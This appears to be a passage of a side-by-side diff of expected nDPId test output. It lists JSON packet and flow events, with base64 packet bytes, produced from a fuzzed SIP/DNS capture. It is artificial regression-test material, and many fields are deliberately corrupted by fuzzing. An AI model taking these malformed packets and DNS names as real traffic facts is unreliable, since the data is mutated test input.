00798{"packet_event_id":1,"packet_event_name":"packet","packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":382,"pkt_l4_len":0,"thread_ts_msec":1120470848682,"pkt":"ADBUADRWAODtAW69CAA\/AAFwa7wAAIARFgHAeQEC1PIhIxPEE8QBXMMEQUNLIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KRnJvbTogImFyaWsiIDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTE3NWExZGQNbENhbGwtSUQ6IDI0NDg3MzkxLTQ0OWJmMmEwQDE5Mi4xNjguMS4yDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yOjUwNjA7YnJhbmNoPXo5aEc0YktucDI0NDY2NDAyLTQ1ZGM2MWQ1MTkyLjE2OC4xLjI7cnBvcnQNClRvOiA8c2lwOjAwOTcyMzkyODcwNDRAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTBMLTA0JXMALTE3MDFiOWEwLTEzYzkyYTY3Mg0KQ1NlcTogMSBBQ0sNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470848686} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120470848686}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1120470849636,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470849636,"pkt":"ADBUADRWAODtAW69CABFAABIa70AAIARS5TAqAECwKgBAQr0ADUANOq3JXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj6XR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1120470849636,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470849636,"pkt":"ADBUADRWAODtAW69CABFAABIa70AAIARS5TAqAECwKgBAQr0ADUANOq3JXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj6XR5AmRrAAAhAAE="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848643,"flow_last_seen":1120470849636,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
@@ -1074,10 +1074,10 @@
00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470849636,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1120470851639,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABIa74AAIARS5PAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1120470851639,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABIa74AAIARS5PAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":553,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CFhFAABIa78AAIARS5LAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAET3VkcANzaXAJY3liZXJjaXR5AuRrAFchAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CFhFAABIa78AAIARS5LAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAET3VkcANzaXAJY3liZXJjaXR5AuRrAFchAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2136,"global_ts_msec":1120470853642} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":554,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2136,"global_ts_msec":1120470853642}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABJa8QAAIARS43AqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470851639,"pkt":"ADBUADRWAODtAW69CABFAABJa8QAAIARS43AqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470857648} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":555,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470857648}
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470851639,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470865650,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1097,8 +1097,8 @@
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00409{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470877496,"pkt":"ADBUADRWAODtAW69CAhFAABEa88AAIARS4bCqAECwKgBAQr3ADUAMHGrsxwAAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00395{"packet_event_id":1,"packet_event_name":"packet","packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470877496,"pkt":"ADBUADRWAODtAW69CAhFAABEa88AAIARS4bCqAECwKgBAQr3ADUAMHGrsxwAAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1120470882724} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1120470882724}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1120470882726,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470882726,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvcAR1QnsxyAAAABAAEAAAAAASVzAAEwAzEyNwdpbi1hZGRyBGF2cGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1120470882726,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470882726,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvcAR1QnsxyAAAABAAEAAAAAASVzAAEwAzEyNwdpbi1hZGRyBGF2cGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1109,8 +1109,8 @@
00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 